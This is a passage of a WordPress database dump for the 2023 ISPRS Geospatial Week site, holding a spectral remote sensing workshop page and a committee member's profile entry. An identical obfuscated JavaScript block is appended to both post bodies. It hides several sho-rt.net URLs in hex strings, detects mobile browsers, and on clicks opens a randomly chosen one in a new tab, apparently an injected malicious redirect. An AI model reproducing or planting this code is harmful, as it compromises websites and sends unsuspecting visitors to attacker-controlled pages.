sessions in the context of the ISPRS Geospatial Week.</strong>\r\n\r\n<u> </u>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>CHAIRS</strong></span></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"73\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_column_text]\r\n<h5><strong>Themes of event:</strong></h5>\r\n<ul>\r\n 	<li>Spaceborne, airborne, terrestrial, marine and mobile multispectral and hyperspectral sensors and data processing</li>\r\n 	<li>Thermal remote sensing</li>\r\n 	<li>Radiometric, atmospheric and geometric calibration/corrections of spectral and thermal data.</li>\r\n 	<li>Spectral unmixing, denoising, dimensionality reduction and compression of hyperspectral and multispectral data</li>\r\n 	<li>Processing and analysis of 1D signals, 2D images, 3D hyperspectral cubes and 4D spectral video datasets</li>\r\n 	<li>Fusion and harmonization of spectral/thermal data with other modalities (e.g., Lidar, SAR, Acoustic), a priori information, geospatial and multitemporal data</li>\r\n 	<li>AI methods for spectral data analysis and understanding</li>\r\n 	<li>Deep learning and explainability for spectral data analysis</li>\r\n 	<li>Cloud-based frameworks for spectral data analytics</li>\r\n 	<li>Edge-computing methods for efficient spectral data processing</li>\r\n 	<li>Analysis and applications based on multi-temporal and multi-sensor data</li>\r\n 	<li>Evaluation benchmarks for assessing method performance, robustness, explainability, scalability and generalization</li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong>Scientific Committee </strong></h5>\r\n<ul>\r\n 	<li>Konstantinos Karantzalos (<a href=\"mailto:karank@central.ntua.gr\">karank@central.ntua.gr</a>), WG III/2 Chair</li>\r\n 	<li>Daniele Cerra (<a href=\"mailto:Daniele.Cerra@dlr.de\">Cerra@dlr.de</a>), WG I/3 Chair</li>\r\n 	<li>Xinlian Liang (<a href=\"mailto:xinlian.liang@whu.edu.cn\">liang@whu.edu.cn</a>), WG II/1 Chair</li>\r\n 	<li>Anna Brook (Israel) (<a href=\"mailto:abrook@geo.haifa.ac.il\">abrook@geo.haifa.ac.il</a>), WG III/2</li>\r\n 	<li>Jean-Louis Roujean (<a href=\"mailto:jean-louis.roujean@univ-tlse3.fr\">jean-louis.roujean@univ-tlse3.fr</a>) , WG III/2</li>\r\n 	<li>Ilkka Pölönen (<a href=\"mailto:ilkka.polonen@jyu.fi\">polonen@jyu.fi</a>) , WG III/2</li>\r\n 	<li>Mi Wang (<a href=\"mailto:wangmi@whu.edu.cn\">wangmi@whu.edu.cn</a>), WG I/3</li>\r\n 	<li>Jose Marcato Junior (<a href=\"mailto:jose.marcato@ufms.br\">marcato@ufms.br</a>), WG I/3</li>\r\n 	<li>Maria Teresa Melis  (<a href=\"mailto:titimelis@unica.it\">titimelis@unica.it</a>), WG II/1</li>\r\n 	<li>Weishu Gong (<a href=\"mailto:wsgong@umd.edu\">wsgong@umd.edu</a>), WG II/1</li>\r\n 	<li>Martin Mokroš (<a href=\"mailto:mokros@fld.czu.cz\">mokros@fld.czu.cz</a>), WG II/1</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<ul>\r\n 	<li>WG III/2 Spectral and Thermal Data Processing and Analytics</li>\r\n 	<li>WG I/3 Multispectral, Hyperspectral and Thermal Sensors</li>\r\n 	<li>WG III/1 Remote Sensing Data Processing and Understanding</li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong>Special Issue dedicated to the workshop:</strong></h5>\r\nAfter the workshop, authors of selected papers will be invited to submit extended versions of their papers to an International Journal (tba). The papers being accepted after the peer-review process of the journal will appear in a Special Issue of that journal dedicated to this workshop.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3861\" img_size=\"1200x1000\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-revision-v1','','','2023-02-06 23:32:22','2023-02-06 23:32:22','',3855,'https://gsw2023.com/?p=3870',0,'revision','',0),
(3871,1,'2023-02-06 23:38:41','2023-02-06 23:38:41','','ws28main','','inherit','open','closed','','ws28main-2','','','2023-02-06 23:38:41','2023-02-06 23:38:41','',3855,'https://gsw2023.com/wp-content/uploads/2023/02/ws28main-1.jpg',0,'attachment','image/jpeg',0),
(3872,1,'2023-02-07 00:06:57','2023-02-07 00:06:57','<!-- wp:paragraph -->\n<p>Lead Technical Authority - Trimble Applanix – Canada</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Mohamed Mostafa','','publish','closed','closed','','dr-mohamed-mostafa','','','2023-08-15 22:24:01','2023-08-15 22:24:01','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3872',0,'dt_team','',0),
(3873,1,'2023-02-07 00:06:38','2023-02-07 00:06:38','','Dr Mohamed_Mostafa','','inherit','open','closed','','dr-mohamed_mostafa','','','2023-02-07 00:06:38','2023-02-07 00:06:38','',3872,'https://gsw2023.com/wp-content/uploads/2023/02/Dr-Mohamed_Mostafa.jpg',0,'attachment','image/jpeg',0),
